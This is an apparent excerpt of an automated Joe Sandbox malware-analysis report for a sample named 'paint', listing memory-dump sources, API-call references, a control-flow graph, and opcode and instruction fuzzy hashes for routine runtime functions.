                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                                • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                                                • Instruction ID: df58461f1ba567b84b3b04b22f6fdbac130d38a3452fa16294b81da0e13de93f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A214F25A09783A1E7509B50E5152EAA366EF86780FC44031EA6ED37D6EF3ED9058780

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 963 7ff6f0becfd0-7ff6f0becff5 964 7ff6f0bed2c3 963->964 965 7ff6f0becffb-7ff6f0becffe 963->965 966 7ff6f0bed2c5-7ff6f0bed2d5 964->966 967 7ff6f0bed000-7ff6f0bed032 call 7ff6f0bea884 965->967 968 7ff6f0bed037-7ff6f0bed063 965->968 967->966 969 7ff6f0bed065-7ff6f0bed06c 968->969 970 7ff6f0bed06e-7ff6f0bed074 968->970 969->967 969->970 972 7ff6f0bed084-7ff6f0bed099 call 7ff6f0bf398c 970->972 973 7ff6f0bed076-7ff6f0bed07f call 7ff6f0bec390 970->973 978 7ff6f0bed1b3-7ff6f0bed1bc 972->978 979 7ff6f0bed09f-7ff6f0bed0a8 972->979 973->972 980 7ff6f0bed210-7ff6f0bed235 WriteFile 978->980 981 7ff6f0bed1be-7ff6f0bed1c4 978->981 979->978 982 7ff6f0bed0ae-7ff6f0bed0b2 979->982 983 7ff6f0bed240 980->983 984 7ff6f0bed237-7ff6f0bed23d GetLastError 980->984 985 7ff6f0bed1fc-7ff6f0bed20e call 7ff6f0beca88 981->985 986 7ff6f0bed1c6-7ff6f0bed1c9 981->986 987 7ff6f0bed0b4-7ff6f0bed0bc call 7ff6f0be4830 982->987 988 7ff6f0bed0c3-7ff6f0bed0ce 982->988 990 7ff6f0bed243 983->990 984->983 1006 7ff6f0bed1a0-7ff6f0bed1a7 985->1006 991 7ff6f0bed1cb-7ff6f0bed1ce 986->991 992 7ff6f0bed1e8-7ff6f0bed1fa call 7ff6f0becca8 986->992 987->988 994 7ff6f0bed0d0-7ff6f0bed0d9 988->994 995 7ff6f0bed0df-7ff6f0bed0f4 GetConsoleMode 988->995 999 7ff6f0bed248 990->999 1000 7ff6f0bed254-7ff6f0bed25e 991->1000 1001 7ff6f0bed1d4-7ff6f0bed1e6 call 7ff6f0becb8c 991->1001 992->1006 994->978 994->995 996 7ff6f0bed1ac 995->996 997 7ff6f0bed0fa-7ff6f0bed100 995->997 996->978 1004 7ff6f0bed189-7ff6f0bed19b call 7ff6f0bec610 997->1004 1005 7ff6f0bed106-7ff6f0bed109 997->1005 1007 7ff6f0bed24d 999->1007 1008 7ff6f0bed260-7ff6f0bed265 1000->1008 1009 7ff6f0bed2bc-7ff6f0bed2c1 1000->1009 1001->1006 1004->1006 1013 7ff6f0bed114-7ff6f0bed122 1005->1013 1014 7ff6f0bed10b-7ff6f0bed10e 1005->1014 1006->999 1007->1000 1015 7ff6f0bed293-7ff6f0bed29d 1008->1015 1016 7ff6f0bed267-7ff6f0bed26a 1008->1016 1009->966 1020 7ff6f0bed124 1013->1020 1021 7ff6f0bed180-7ff6f0bed184 1013->1021 1014->1007 1014->1013 1018 7ff6f0bed2a4-7ff6f0bed2b3 1015->1018 1019 7ff6f0bed29f-7ff6f0bed2a2 1015->1019 1022 7ff6f0bed283-7ff6f0bed28e call 7ff6f0be4f34 1016->1022 1023 7ff6f0bed26c-7ff6f0bed27b 1016->1023 1018->1009 1019->964 1019->1018 1024 7ff6f0bed128-7ff6f0bed13f call 7ff6f0bf3a58 1020->1024 1021->990 1022->1015 1023->1022 1029 7ff6f0bed141-7ff6f0bed14d 1024->1029 1030 7ff6f0bed177-7ff6f0bed17d GetLastError 1024->1030 1031 7ff6f0bed14f-7ff6f0bed161 call 7ff6f0bf3a58 1029->1031 1032 7ff6f0bed16c-7ff6f0bed173 1029->1032 1030->1021 1031->1030 1036 7ff6f0bed163-7ff6f0bed16a 1031->1036 1032->1021 1034 7ff6f0bed175 1032->1034 1034->1024 1036->1032
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F0BECFBB), ref: 00007FF6F0BED0EC
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6F0BECFBB), ref: 00007FF6F0BED177
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                                • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                                • Instruction ID: 414f2d05418fb9737e174909a2bf75e93a5527519b2aea8965243ee4d6b7e42a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A291D232F18652A5F7508F6594402BD2BA0BF46B88F944179DE2FA7BC5EE7ED442C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                                                                • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                                • Instruction ID: cccca9982455505907bd609a329f278d3302aa75bf3c049b2fc4fda44ec7def4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1441B322D1C78293E7508B6095203797360FB96764F509374EAAE43BD2EF7DA5E08740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                                                                                                • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                                • Instruction ID: 8e4c4bb0909cf8ca5eaa2e81ded4e2c9b6fae10a0641351acb7612431c8c09b0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20313C25E0E14372FB64AB6498653B997939F47384FC44435E96FC73D3FE2EA40A8240
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                                                • Instruction ID: be74dd293d117c05c7857bd3abfddd474d6b2c5291924eae55ba529066298d8b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7D06714B18647A2EB142BB0589947812556F4AB42B942478CC2B973D3FD3EE44D4300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                                • Instruction ID: bddd2f935531eea7d3dd973352540b6ca21a799fa271a0e8de2467b77e01a76e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35516061B1924256F7288E659C0067E62D1BF46BA4F944730EE7FC77C5EF3ED4818600
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                                • Instruction ID: a1ad9a8724109884aa36773a5892bb64cecb199cb843368319e60c6aae050607
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F511E362718B8291DB108B25B804169A761FB46BF4FE44331EE7E8B7E9EF3DD0128700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9CE
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9D8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                                                • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                                                • Instruction ID: 4f96a63e2b56431027e083b47479c545e998f203d28cf6a2fccdb47535a56bdc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93E08614F08203B2FF086BF2544553911556F8AB41F844074C83FC33E2FE3D68858300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,00007FF6F0BEAA45,?,?,00000000,00007FF6F0BEAAFA), ref: 00007FF6F0BEAC36
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6F0BEAA45,?,?,00000000,00007FF6F0BEAAFA), ref: 00007FF6F0BEAC40
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                                                                • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                                • Instruction ID: 188da01fbd1217558132e3043fc76005b0ac9a0891bc233e322a14be12081a13
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2021D511F1CA4262FF905761A89037D5696DF86BA0FA842B5DA3FC73C1EE6DF4458300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                                • Instruction ID: f44f6f3032b1933a7c1f4286aec8d8bcb5a27749d9fbf57c0ef4dfd71e3e5353
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B41F232908201D7EB348B19A44067A77A4EB47B80F904171DAAFC77D2EF2EF402CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                                                                • Opcode ID: 20a1915374d9a45148f36cae7429d8e519dbe3a1c715783fd4ae813ac2a96e38
                                                                                                                                                                                                                                                                • Instruction ID: c4ca71f214e1fba252958b26d5fe2d9568249544969e4d9ec9bdc101b91cf29f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20a1915374d9a45148f36cae7429d8e519dbe3a1c715783fd4ae813ac2a96e38
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D21E721B1965266FB14AB1269047BAE652BF47BC4FCC4430EE2E877C6EE7EE045C640
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                                                • Instruction ID: 3d1b319e6ae49f0ec4debbcef323aebba5cfcf15e587e925038eadfd4046369b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3231E132E18642A5FB115B55984177D2660AF42F94FC202B5EA3F833D2EF7EE8418720
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3947729631-0
